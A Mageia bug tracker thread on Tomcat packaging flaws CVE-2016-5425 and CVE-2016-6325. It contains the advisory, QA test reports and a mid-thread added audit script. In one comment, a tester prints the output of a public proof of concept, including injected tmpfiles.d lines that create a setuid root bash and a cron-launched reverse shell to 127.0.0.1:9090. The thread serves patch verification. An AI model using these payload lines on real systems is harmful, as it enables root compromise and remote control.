Bug 19560 - tomcat new security issue CVE-2016-5425 and CVE-2016-6325
Summary: tomcat new security issue CVE-2016-5425 and CVE-2016-6325
Status: RESOLVED DUPLICATE of bug 19672
Alias: None
Product: Mageia
Classification: Unclassified
Component: Security
Version: 5
Hardware: All Linux
Priority: Normal critical
Target Milestone: ---
Assignee: QA Team
QA Contact: Sec team
URL: http://lwn.net/Vulnerabilities/703243/
Whiteboard: MGA5-64-OK
Keywords:
Depends on:
Blocks:
 
Reported: 2016-10-10 17:30 CEST by David Walser
Modified: 2016-10-29 17:03 CEST

See Also:
Source RPM: tomcat-8.0.37-1.mga6.src.rpm
CVE:
Status comment:


Attachments
RedHat PoC script for CVE-2016-5425 (1.60 KB, application/x-shellscript)
2016-10-27 00:26 CEST, Len Lawrence

Description David Walser 2016-10-10 17:30:29 CEST
A packaging security issue in Tomcat has been announced today (October 10):
http://openwall.com/lists/oss-security/2016/10/10/2
David Walser 2016-10-10 17:30:41 CEST

Whiteboard: (none) => MGA5TOO

Comment 1 David Walser 2016-10-11 20:18:39 CEST
RedHat has issued an advisory for this on October 10:
https://rhn.redhat.com/errata/RHSA-2016-2046.html

URL: (none) => http://lwn.net/Vulnerabilities/703243/
Summary: tomcat new security issue CVE-2016-5425 => tomcat new security issue CVE-2016-5425 and CVE-2016-6325

Comment 2 Marja Van Waes 2016-10-13 12:15:12 CEST
Assigning to maintainer

CC: (none) => marja11
Assignee: bugsquad => mageia

Comment 3 David GEIGER 2016-10-24 18:43:19 CEST
CVE-2016-5425 and CVE-2016-6325 are fixed for both mga5 and cauldron!

CC: (none) => geiger.david68210

Comment 4 David Walser 2016-10-24 19:10:38 CEST
Thanks David!

Testing procedure:
https://bugs.mageia.org/show_bug.cgi?id=8307#c17

Advisory:
========================

Updated tomcat packages fix security vulnerability:

It was discovered that the Tomcat packages installed the configuration file
/usr/lib/tmpfiles.d/tomcat.conf as writeable to the tomcat group. A member of the
group or a malicious web application deployed on Tomcat could use this flaw to
escalate their privileges (CVE-2016-5425).

It was discovered that the Tomcat packages installed certain configuration
files read by the Tomcat initialization script as writeable to the tomcat group.
A member of the group or a malicious web application deployed on Tomcat could
use this flaw to escalate their privileges (CVE-2016-6325).

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5425
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6325
https://rhn.redhat.com/errata/RHSA-2016-2046.html
========================

Updated packages in core/updates_testing:
========================
tomcat-7.0.68-1.4.mga5
tomcat-admin-webapps-7.0.68-1.4.mga5
tomcat-docs-webapp-7.0.68-1.4.mga5
tomcat-javadoc-7.0.68-1.4.mga5
tomcat-jsvc-7.0.68-1.4.mga5
tomcat-jsp-2.2-api-7.0.68-1.4.mga5
tomcat-lib-7.0.68-1.4.mga5
tomcat-servlet-3.0-api-7.0.68-1.4.mga5
tomcat-el-2.2-api-7.0.68-1.4.mga5
tomcat-webapps-7.0.68-1.4.mga5

from tomcat-7.0.68-1.4.mga5.src.rpm

Version: Cauldron => 5
Assignee: mageia => qa-bugs
Whiteboard: MGA5TOO => (none)
Severity: normal => critical

Comment 5 Len Lawrence 2016-10-26 18:57:49 CEST
Testing this on x86_64 with the advised procedure.

CC: (none) => tarazed25

Comment 6 Lewis Smith 2016-10-26 22:41:24 CEST
Testing M5 x64 on real hardware, using the test link to get started:
 https://bugs.mageia.org/show_bug.cgi?id=8307#c17

@Len: I had already started looking into this yesterday...

BEFORE the update, I had to add 'tomcat-webapps' and 'tomcat-admin-webapps':
 tomcat-7.0.68-1.3.mga5
 tomcat-admin-webapps-7.0.68-1.3.mga5
 tomcat-el-2.2-api-7.0.68-1.3.mga5
 tomcat-jsp-2.2-api-7.0.68-1.3.mga5
 tomcat-lib-7.0.68-1.3.mga5
 tomcat-servlet-3.0-api-7.0.68-1.3.mga5
 tomcat-webapps-7.0.68-1.3.mga5

"Edit /etc/tomcat/tomcat-users.xml and uncomment the users, adding manager-gui role to one of them"
I uncommented the given role/user list, and the subsequent
 <role rolename="manager-gui"/>
line; and added "manager-gui" to users tomcat & role1 roles.
 # systemctl restart tomcat.service

 http://localhost:8080/
Shows the entry page, with "Apache Tomcat/7.0.68" and "If you're seeing this, you've successfully installed Tomcat. Congratulations!";
and the "Manager App" button.

I could not initially log in to that with either 'tomcat' or 'role1' pre-defined (and pre-noted) passwords, so maybe I did something wrong. The login error page explicitly said to add:-
 <role rolename="manager-gui"/>
 <user username="[...]" password="[...]" roles="manager-gui"/>
so I added a new user like that.
 # systemctl restart tomcat.service
and that worked, showing the "Tomcat Web Application Manager" page, which leads to all other things - including the .../examples and .../sample links. You only need the entry link above (if you can log in as Manager).

Tried lots of links, which mostly worked - and quickly -; but the 'WebSocket (JSR356) Examples' collection was a flop.

AFTER update of all the modules shown above to version -7.0.68-1.4.mga5, then
 # systemctl restart tomcat.service     [just in case]

All worked fine as before, tried other demonstration links - one of which invoked Java [IcedTea being installed] and worked, eventually.

One unhappiness: after successfully logging in as Manager before the update, I could see no way of logging OUT. After re-starting the Tomcat service post-update, the  http://localhost:8080/ "Manager App" link took me straight to the "Web Application Manager" page *without being asked to login*. I tried re-starting 'httpd' then 'tomcat' services, same problem. I cannot say whether this was true before the update; or perhaps a re-boot will resolve it. I will try that tomorrow.

In spite of which, the update looks good for the moment.

CC: (none) => lewyssmith
Whiteboard: (none) => MGA5-64-OK

Comment 7 Len Lawrence 2016-10-26 23:30:09 CEST
Oh.  Sorry to tread on your toes.  I shall append my report anyway, having spent all evening on it.  Managed to run a PoC for one of the issues.
Comment 8 Len Lawrence 2016-10-26 23:35:17 CEST
Installed updates piecemeal.
Cherry-picking after MageiaUpdate had provided:
      1/8: apache-commons-pool
      2/8: tomcat-el-2.2-api
      3/8: tomcat-jsp-2.2-api
      4/8: apache-commons-daemon
      5/8: geronimo-jta
      6/8: apache-commons-dbcp
      7/8: tomcat-lib
      8/8: tomcat
Failed to open 'tomcat.conf', ignoring: No such file or directory
Installed the other packages listed.
# ls -l /etc/tomcat
total 224
drwxrwxr-x 3 root tomcat   4096 Oct 26 18:02 Catalina/
-rw-r--r-- 1 root tomcat  12257 Oct 24 17:40 catalina.policy
-rw-r--r-- 1 root tomcat   6322 Oct 24 17:40 catalina.properties
drwxr-xr-x 2 root tomcat   4096 Oct 26 18:02 conf.d/
-rw-r--r-- 1 root tomcat   1394 Oct 24 17:40 context.xml
-rw-r--r-- 1 root tomcat   3288 Oct 24 17:40 logging.properties
-rw-r--r-- 1 root tomcat   6613 Oct 24 17:40 server.xml
-rw-r--r-- 1 root tomcat   1825 Oct 24 17:40 tomcat.conf
-rw-r----- 1 root tomcat   1974 Oct 26 18:14 tomcat-users.xml
-rw-r----- 1 root tomcat   1998 Oct 24 17:40 tomcat-users.xml~
-rw-r--r-- 1 root tomcat 168818 Oct 24 17:40 web.xml

Edited tomcat-users.xml to give "role-rolename" manager-gui privileges.

Firefox -> http://localhost:8080/sample
This led to the "Hello, World" application and provided a couple of links, which worked.
Firefox -> http://localhost:8080/examples
This provided four links to follow.
One lists examples some of which are interactive and many of which provide the source code (Java, HTML).  Everything seemed to be working.
Comment 9 Len Lawrence 2016-10-26 23:41:42 CEST
The CVE-2016-5425 link provides a PoC in the form of a script. 
$ ./tomcat-RH-root.sh 

* Apache Tomcat (RedHat distros) - Root PrivEsc PoC CVE-2016-5425 *
  Discovered by Dawid Golunski

[+] Checking vulnerability
stat: cannot stat ‘/usr/lib/tmpfiles.d/tomcat.conf’: No such file or directory
Not vulnerable or tomcat installed under a different user than 'tomcat'

The implication is that this should be tested under the user tomcat.
Comment 10 Len Lawrence 2016-10-26 23:43:49 CEST
Moved to another machine and installed a new user = tomcat
Logged in as tomcat.
Installed the tomcat packages from normal updates and ran the test script.

$ ./tomcat-RH-root.sh

* Apache Tomcat (RedHat distros) - Root PrivEsc PoC CVE-2016-5425 *
  Discovered by Dawid Golunski

[+] Checking vulnerability
root tomcat

[+] Your system is vulnerable!

[+] Appending data to /usr/lib/tmpfiles.d/tomcat.conf...
[+] /usr/lib/tmpfiles.d/tomcat.conf contains:
f /var/run/tomcat.pid 0644 tomcat tomcat -
C /usr/share/tomcat/rootsh 4770 root root - /bin/bash
z /usr/share/tomcat/rootsh 4770 root root -
F /etc/cron.d/tomcatexploit 0644 root root - "* * * * * root nohup bash -i >/dev/tcp/127.0.0.1/9090 0<&1 2>&1 & \n\n"

[+] Payload injected! Wait for your root shell...

Once '/usr/bin/systemd-tmpfiles --create' gets executed (on reboot by tmpfiles-setup.service, by cron, by another service etc.), 
the rootshell will be created in /usr/share/tomcat/rootsh. 
Additionally, a reverse shell should get executed by crond shortly after and connect to 127.0.0.1:9090 

Updated the packages from Updates/Testing

$ ./tomcat-RH-root.sh

* Apache Tomcat (RedHat distros) - Root PrivEsc PoC CVE-2016-5425 *
  Discovered by Dawid Golunski

[+] Checking vulnerability
stat: cannot stat ‘/usr/lib/tmpfiles.d/tomcat.conf’: No such file or directory
Not vulnerable or tomcat installed under a different user than 'tomcat'

This demonstrates that the modifications have dealt with the vulnerability exposed in CVE-2016-5425.
Comment 11 Len Lawrence 2016-10-27 00:13:20 CEST
For CVE-2016-6325 I think these directory listings show that tomcat cannot interfere with the system files, after the updates.

$ ls -l /etc/tomcat
total 220
drwxrwxr-x 3 root tomcat   4096 Oct 24 17:40 Catalina
-rw-r--r-- 1 root tomcat  12257 Oct 24 17:40 catalina.policy
-rw-r--r-- 1 root tomcat   6322 Oct 24 17:40 catalina.properties
drwxr-xr-x 2 root tomcat   4096 Oct 26 22:17 conf.d
-rw-r--r-- 1 root tomcat   1394 Oct 24 17:40 context.xml
-rw-r--r-- 1 root tomcat   3288 Oct 24 17:40 logging.properties
-rw-r--r-- 1 root tomcat   6613 Oct 24 17:40 server.xml
-rw-r--r-- 1 root tomcat   1825 Oct 24 17:40 tomcat.conf
-rw-r----- 1 root tomcat   1998 Oct 24 17:40 tomcat-users.xml
-rw-r--r-- 1 root tomcat 168818 Oct 24 17:40 web.xml
$ ls -l /etc/sysconfig/tomcat
-rw-r--r-- 1 root root 490 Oct 24 17:40 /etc/sysconfig/tomcat
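A read-only audit for the condition the advisory in comment 4 describes and that the listings in this comment check by hand: files root reads (the tmpfiles.d fragment and the files sourced by the tomcat init script) must not be writable by the tomcat group. This is an added example, not part of the bug report, the RedHat PoC or the Mageia packages; it assumes GNU stat and a service group named tomcat, and the file list is taken from the advisory and the listings above.

```shell
#!/bin/sh
# Added example (not from the bug report, the RedHat PoC or the Mageia
# packages): audit the files behind CVE-2016-5425 / CVE-2016-6325 for
# write access by the tomcat group. Assumes GNU stat (Linux) and that the
# service group is named "tomcat".

# group_can_write FILE GROUP
# Succeeds (0) when GROUP could modify FILE: the file is world-writable, or it
# belongs to GROUP and has the group write bit set. A missing file cannot be
# abused (the fixed Mageia package ships no tmpfiles.d fragment), so it is
# treated as safe (1).
group_can_write() {
    f=$1
    g=$2
    [ -e "$f" ] || return 1
    mode=$(stat -c '%A' "$f")            # e.g. -rw-rw-r--
    fgroup=$(stat -c '%G' "$f")
    gw=$(printf '%s' "$mode" | cut -c6)  # group write bit
    ow=$(printf '%s' "$mode" | cut -c9)  # other write bit
    [ "$ow" = w ] && return 0
    [ "$fgroup" = "$g" ] && [ "$gw" = w ] && return 0
    return 1
}

# audit_tomcat_files GROUP FILE...
# Prints each offending file and returns how many there were (0 = clean).
audit_tomcat_files() {
    g=$1
    shift
    bad=0
    for f in "$@"; do
        if group_can_write "$f" "$g"; then
            printf 'WRITABLE by %s: %s (%s)\n' "$g" "$f" "$(stat -c '%A %U:%G' "$f")"
            bad=$((bad + 1))
        fi
    done
    return "$bad"
}

# Files named in the advisory and in the listings of this bug report.
TOMCAT_FILES="/usr/lib/tmpfiles.d/tomcat.conf /etc/sysconfig/tomcat
/etc/tomcat/tomcat.conf /etc/tomcat/server.xml /etc/tomcat/tomcat-users.xml"

# Usage: sh audit-tomcat.sh --run   (nothing runs when the file is only sourced)
if [ "${1:-}" = --run ]; then
    audit_tomcat_files tomcat $TOMCAT_FILES && echo "No group-writable tomcat files found."
fi
```

Running it on the pre-update system would flag /usr/lib/tmpfiles.d/tomcat.conf (group tomcat, mode 664 or similar); after the update the file is absent and the remaining files are root-owned with mode 644 or 640, so the script exits 0.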
Comment 12 Len Lawrence 2016-10-27 00:22:18 CEST
@Lewis
I will try the admin route as well, tomorrow, to see if I hit the same problems.
Comment 13 Len Lawrence 2016-10-27 00:26:34 CEST
Created attachment 8602 [details]
RedHat PoC script for CVE-2016-5425
Comment 14 Len Lawrence 2016-10-27 11:57:18 CEST
Tried the localhost:8080 interface.  That came up fine and allowed an admin login for manage interface.  Checked server status and looked for leaks - none reported.  Used Back button to get back to the initial interface.  Closed tab.
Went back in.  Clicked "Manager App".  This went straight to the manager page without a login so admin had not been logged out.  Closed tab.

Closing browser, stopping tomcat.service and logging out.
Comment 15 Len Lawrence 2016-10-27 12:49:26 CEST
Not sure if rebooting helped.  Pointed firefox at localhost:8080 again and tried the manager app button and went to the Web Application Manager page immediately.  Previously this always raised a 403 error - not privileged.
Back to the main interface and tried Host manager.  That gave a 403 error which indicates that the session did not belong to admin.  Before rebooting I had logged in as the designated user by invoking Host manager.  Looks like the last login persists across reboots.

Perused some of the documentation to find hints on using the web gui, in particular how to log out, and there was nothing.  Nothing in the FAQ section.  The documentation is sadly lacking in any kind of help for real beginners.  Instead you are advised to take your queries to the user community and subscribe to the mailing list.  !!
Comment 16 David Walser 2016-10-29 17:03:32 CEST
Moving this to Bug 19672.

*** This bug has been marked as a duplicate of bug 19672 ***

Status: NEW => RESOLVED
Resolution: (none) => DUPLICATE

